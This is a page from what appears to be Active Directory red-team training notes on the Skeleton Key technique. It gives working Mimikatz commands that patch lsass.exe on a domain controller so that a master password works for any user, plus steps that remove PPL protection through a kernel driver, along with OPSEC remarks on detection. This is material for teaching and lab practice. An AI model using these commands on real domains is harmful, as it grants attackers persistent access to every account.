8.4 - Skeleton Key

Skeleton Key

Skeleton Key is a Domain Controller (DC) post-exploitation persistence technique where the lsass.exe process is patched in memory to accept a master password for all users.

Key Concepts

Discovered by Dell SecureWorks in malware named Skeleton Key.
Once injected, any valid username can be used to authenticate with a universal password (usually mimikatz).
Does not survive reboots, as it’s a memory patch.
Can cause instability and interfere with services like Active Directory Certificate Services (AD CS).
Requires Domain Admin privileges.

Usage with Mimikatz (PowerShell Remoting)

To inject the Skeleton Key into lsass.exe on a Domain Controller:

Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dcorp-dc.dollarcorp.moneycorp.local

After injection, login to any machine in the domain using any valid username and the password mimikatz.

Example:

Enter-PSSession -ComputerName dcorp-dc -Credential dcorp\Administrator

OPSEC Warning: Easily detectable due to behavior and logging. Avoid on mature/monitored environments.

If `lsass.exe` is a Protected Process (PPL)

In some environments, lsass runs with Protected Process Light (PPL). You can still inject Skeleton Key using the Mimikatz driver:

mimikatzCopiaModificamimikatz # privilege::debug
mimikatz # !+
mimikatz # !processprotect /process:lsass.exe /remove
mimikatz # misc::skeleton
mimikatz # !-

This involves kernel-mode driver loading (mimidriv.sys) and is very noisy—triggers EDR alerts and logging.

Previous8.3 - Diamond Ticket Next8.5 - DSRM

Last updated 8 months ago

hashtagSkeleton Key

hashtagKey Concepts

hashtagUsage with Mimikatz (PowerShell Remoting)

hashtagIf lsass.exe is a Protected Process (PPL)

Skeleton Key

Key Concepts

Usage with Mimikatz (PowerShell Remoting)

If `lsass.exe` is a Protected Process (PPL)